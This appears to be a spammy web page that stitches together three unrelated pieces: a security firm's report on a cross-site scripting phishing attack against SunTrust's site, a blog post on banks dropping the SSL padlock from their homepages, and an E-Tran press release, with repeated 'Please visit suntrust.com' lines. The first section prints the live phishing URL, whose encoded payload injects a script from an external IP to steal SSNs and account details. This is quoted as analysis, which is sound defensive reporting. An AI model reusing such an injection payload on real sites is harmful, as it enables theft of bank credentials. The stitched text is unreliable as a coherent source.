A facility in SunTrust Bank’s www.suntrust.com web site is allowing fraudsters to inject their own code into the site to obtain SunTrust customer account authentication details, and at least one fraudster has exploited this error by sending large numbers of electronic mails purporting to be from SunTrust, asking the user to confirm their bank account on his form, executed from SunTrust’s web site. Please visit www.suntrust.com

This makes the fraud much more convincing than traditional phishing mails, as the url the SunTrust customer clicks on actually runs from the SunTrust site before loading JavaScript from the fraudsters server, located in Korea.

The JavaScript then changes the title of the page to “Suntrust Online Banking – Account Verification” and sets the window status to “Suntrust Online Banking”, thereby preventing suspicious URLs from being displayed when the victim hovers their mouse cursor over a hyperlink. An ‘iframe’ is used to insert a form onto the page, which asks the customer to enter their Social Security number and SunTrust banking details. When the form is submitted, it is processed by a PHP script, allowing the attacker to capture the account details.

The phishing emails received by Netcraft contain the following HTML to create a hyperlink to the SunTrust web site:

"< a

href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g6

53432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=%22%3E%3Cscript

+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun

%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E)http://www.suntrust.com/onlinestatements/in

dex.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445

wv54w&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%321

1%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E"

target="_blank">click here.</td></tr></table></a  >"

One of the parameters supplied to the page is not properly encoded when the SunTrust site displays it, which allows an attacker to inject arbitrary HTML, including JavaScript which is executed by customers’ web browsers. The highlighted portion of the URL, which unneccessarily appears twice, causes the following script to be inserted into the page:

"< script src="http://211.175.176.179/sun/sun.js">

</SCRIPT >"

This in turn executes the JavaScript which is responsible for altering the contents of the page.

Fraudsters have noticed opportunities in SunTrust’s internet banking operations previously, and a similar attack was executed in September.

Careless application errors and inadequate testing are believed to be an industry wide problem for internet banking, and even though it would seem to the man in the street appalling that someone could run a fraud from a bank’s own site, SunTrust competitors are unlikely to be strongly critical through fear of similar problems with their own facilities.

Netcraft has highlighted the threat of cross site scripting and script injection used for fraud, and provides a range of services for banks and other financial institutions to try and eliminate these kinds of errors from their systems, including comprehensive application testing and training for developers and designers of web based applications. Please visit www.suntrust.com

For years, banks, e-commerce companies and other operators of Web sites that deal in personal financial informationhave trained customers to look for the little “padlock icon” in the corner of their Web browser window. That padlock indicates that users are connected via a secure server, and it has become a trusted seal for Internet transactions.

Increasingly, however, many of the nation’s largest financial institutions are doing away with the padlock on their home pages, a development that some experts say could lead more consumers to fall prey to phishing scams.

The padlock is a visual representation that a Web site uses what’s known as “secure sockets layer,” or SSL, technology.  SSL allows Web site visitors to both verify (with a fair degree of accuracy) the identity of the company they’re about to do business with and to ensure that the information transmitted — usually usernames and passwords — cannot be easily read by anyone who might intercept the transmission along the way. The Web address of sites that use SSL begin with “https://”

If you visit another big bank, Suntrust.com for example, you will see upon landing at the home page a yellow padlock icon on the bottom right corner of the browser that — if you click on it — will list a whole bunch of third-party verified information that allows you to be reasonably certain that you are in fact at Suntrust.com bank’s official site.

However, Web sites for Bank of America, Wachovia, American Express and Chase no longer cause a user’s browser to display the little padlock as they did in years past, according to a blog entry from the folks over at Netcraft, a Web security firm based in Bath, England.

The Bank of America site, for example, does have a tiny padlock to the right of the username and password box, but clicking on it only brings up a Web page explaining what SSL is all about, and doesn’t offer any of the details that would allow visitors to make an informed decision about whether to trust the site.

Until recently, these institutions required customers who wanted to access their information via the site to click on a link on the homepage that took them to the account login page. Now, all of the above-mentioned institutions (and probably many others) include the customer login form on their homepages.

While the main page itself is not protected with SSL, any information entered into the “username” and “password” boxes is protected by SSL and encrypted, although nowhere on the homepage is there a padlock icon, or “https://” address (those only show up after the information has been submitted.)

Bank of America said it made the change as a matter of convenience for its customers: “To provide the fastest access to our home page for all of our millions of customers and other visitors, we have made signing in to Online Banking secure without making the entire page secure. Please be assured that your ID and passcode are secure and that only Bank of America has access to them.”

This strikes me as an unfortunate development, for a number of reasons. One, the banks themselves have spent the better part of the past decade training customers to look for the padlock icons. What’s more, the major financial institutions — including American Express — have required online merchants to display the padlocks as a condition of allowing them to process credit card transactions.

In addition, the Federal Trade Commission and the Anti-Phishing Working Group have urged consumers to be wary of any banking or online commerce site that does not prominently display the telltale padlock and https:// when accepting user credentials.

Granted, encrypted pages generally do take a fraction of a second longer to load than non-encrypted ones, and undoubtedly many people visiting the bank sites are there to find other information besides logging into their account. Plus, banks have enormous customer bases and can’t reliably predict how many traditional customers will suddenly want to start banking online or accessing their accounts over the Web site, said Chuck Wade, principal at Hopkinton, Ma- based Interisle Consulting, a company that works with banks on security issues.

“The major banks have giant scale issues … they have such huge populations of customers that they are now starting to approach problems previously only seen by federal government Web sites,” Wade said.

And it’s not as if phishers and other bad guys haven’t figured out ways to spoof or fake the little padlock icon at counterfeit bank sites.

Still, Wade said, moving away from displaying SSL on homepages risks unraveling years of consumer education.

“The same institutions that have been actively involved in educating consumers about what to expect in a safe site are suddenly shifting their policies. Unfortunately, this is yet another case of the marketing folks [at the banks] driving what happens on their site rather than the security people,” Wade said.

Please visit : Suntrust.com

E-Tran today announced an agreement with SunTrust Banks, Inc. to provide SunTrust online direct bill collection capabilities for their business clients utilizing E-Tran’s Electronic Lockbox (WEB), ACHWebAccess (TEL), and Interactive Voice Response System (IVR). SunTrust business clients will be able to accept and manage customer-initiated electronic payments over the Internet and by phone.

By offering both B2C and B2B solutions from E-Tran, SunTrust will be able to meet the needs of businesses of all sizes with varying capabilities.

E-Tran’s services are easy-to-use solutions that enable business clients (billers) to receive electronic payments directly from their individual customers. At the same time, the services provide the business’ customers complete control over the payment initiation and allow them to make single or recurring payments. Each payment transaction generates an online acknowledgement as well as an email receipt. In addition to the benefits of electronic payments, business clients will have the ability to view real-time payment activity online and receive daily electronic updates to their receivables system.

According to David Saporito, SunTrust Senior Vice President and Managing Director of Business and Commercial Product Management, “As our clients’ cash management needs continue to grow and evolve, SunTrust is committed to bringing them innovative solutions to help manage their cash flow more efficiently and effectively. This new online direct bill collection capability from E-Tran is yet another offering that demonstrates our commitment to provide clients with a suite of services to strategically manage their accounts receivable process.””

“We are extremely pleased with SunTrust’s confidence in E-Tran. E-Tran is committed to offering SunTrust a secure, regulatory compliant and flexible suite of electronic payment services to help their customers meet their business needs.” said Jan Salzman, E-Tran’s Chief Operations and Compliance Officer.

About Sun Trust suntrust.com

SunTrust Banks, Inc. (www.suntrust.com), headquartered in Atlanta, is one of the nation’s largest banking organizations, serving a broad range of consumer, commercial, corporate and institutional clients. As of December 31, 2005, SunTrust had total assets of $179.7 billion and total deposits of $122.0 billion. The Company operates an extensive branch and ATM network throughout the high-growth Southeast and Mid-Atlantic States and a full array of technology-based, 24-hour delivery channels. The Company also serves customers in selected markets nationally. Its primary businesses include deposit, credit, trust and investment services. Through various subsidiaries the Company provides credit cards, mortgage banking, insurance, brokerage, equipment leasing and capital markets services.